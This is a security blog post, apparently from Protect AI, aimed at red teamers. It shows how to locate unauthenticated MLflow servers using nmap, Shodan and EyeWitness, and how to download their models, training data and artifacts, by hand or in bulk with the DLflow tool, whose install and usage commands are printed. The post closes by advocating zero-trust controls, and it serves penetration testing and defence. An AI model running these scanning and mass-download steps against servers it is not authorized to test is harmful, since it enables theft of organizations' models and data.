PAI-favicon-120423 MLSecOps-favicon icon3

Hacking AI: Steal Models from MLflow, No Exploit Needed

No Authentication Can Lead To Problems

  • MLflow comes with no authentication out of the box which allows all users to access all other users' models and data
  • Red teamers can use our utility below to show organizations weaknesses in their AI infrastructure

ML and AI are valuable IP for businesses, but security teams are often unaware of how to help companies protect these assets due to a lack of tools used to pen-test ML systems.

This post provides a method for red teamers and pen-testers to "access" and "steal" valuable AI models, which can be worth millions.

One popular tool used in many ML systems is MLflow (which has over 13 million downloads per month). This blog is intended to teach pen-testers, red teamers, and ethical hackers one way to help prevent the breach of AI models without exploiting two MLflow CVEs recently discovered by Protect AI.

It should be noted that MLflow is not unique in its vulnerabilities. MLflow is just one case study in the OSS ML supply chain that has endemic, structural challenges relating to security best practices. Let's begin penetration testing of a ML pipeline.

 

Surfacing MLflow Servers

AI models are often stored in model repositories. One of the most popular assets used to build model repositories is MLflow, which offers a simple web interface or programmatic API to see, store, and run models.

Nmap and other network scanning tools do not currently identify MLflow service fingerprints (although Protect AI has submitted to the maintainers). As such, one way to identify MLflow services on a network is to use a tool such as https://github.com/FortyNorthSecurity/EyeWitness to collect a screenshot of all the webservers on a network. An average MLflow web user interface will look something like this:

mlflow homepage

Another technique for finding MLflow servers is to run a Nmap scan of the network with service fingerprinting on and save the output to a file.

nmap -sV -oX nmapscan.xml 192.168.0.0/24

Next, search the output file (nmapscan.xml) for <title>MLflow</title> and you’ll find the MLflow servers.

One way to understand if your organization is publicly exposed is to execute a search on shodan.io with the query http.html:MLflow.

Shodan

 

The Shodan trends page shows the ever increasing popularity of MLflow.

 

Screenshot 2023-03-20 at 2.01.20 PM

Accessing Models and Data

By default there is no authentication on MLflow servers. There is also not a built-in way of creating authentication within the application. Putting the MLflow server behind a firewall on the internal network isn’t sufficient because getting inside the perimeter can be achieved with a successful phishing attack.

Zero trust security would help solve this problem by adding fine grained authorization/authentication along with artifact attestation and provenance to know when they have been changed. However, most of the AI engineering world has yet to embrace Zero Trust Security; the idea that users should be explicitly given permission to access objects rather than defaulting to full permissions for everyone. (This is a focus of Protect AI and we will be detailing more about this in the future.)

For a red teamer, the most attractive part of MLflow is the ability to remotely download trained models which could be fundamental to the operation of an organization.

How does one do this using a default MLflow installation?

Click any experiment in the column “Run Name” which brings you to the experiment details. Then click Artifacts, click the model within Artifacts, and click the download button on the right.

download artifact

You have remotely "stolen" an organization’s AI models.

Should the data used to train the model also be stored in the repository, then you have access to download that data as well. Other interesting tidbits in the web UI include full local file paths or paths to S3 buckets which can be further explored for sensitive information and artifacts, particularly if security best practices such as encryption are not activated by default.

Scripting the Process

Protecting any system begins with understanding where it's vulnerable. In that spirit, while a pen tester or red teamer could use the MLflow programmatic API to download artifacts from remote MLflow instances without authentication, we’ve sped up the process with a tool named DLflow located in our MLflow suite of security tools, in order to help further secure MLflow systems. You can download those tools here:

https://github.com/protectai/Snaike-MLflow

DLflow downloads all artifacts found in an MLflow server via asynchronous requests and requires less ML coding knowledge, allowing nearly any penetration testing team to help their organization better secure their ML tool stack.  Simple instructions for use follow:

Installation

git clone https://github.com/protectai/Snaike-MLflow
cd Snaike-MLflow/DLflow
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

Usage

From an NMap XML file:

nmap -sV 1.2.3.4/24 -oX /path/to/nmapscan.xml
python DLflow.py -f /path/to/nmapscan.xml

For a specific server:

python DLflow.py -s http://1.2.3.4:5000

 

Problem One is Zero Trust

Developers in fast-paced emerging tech fields like AI often cut corners on security, but prevention is better than cure. In an ML system and AI application, Zero Trust Architecture combined with a solid understanding of every bit and piece that makes up a tool or network, including MLflow, would be a security framework that assumes that no device, user, or network component should be trusted by default, and that all interactions must be authorized and authenticated. It focuses on the principle of "never trust, always verify," which reduces the risk of security breaches and data leaks by compartmentalizing access to data and systems.

Zero Trust Architecture includes features such as fine-grained authorization and artifact attestation, which provide more control and accountability in the machine learning lifecycle. By embracing Zero Trust Architecture in their AI environments, organizations can establish a secure and reliable foundation for their ML systems and AI applications. Let's prioritize security and prevent potential disasters!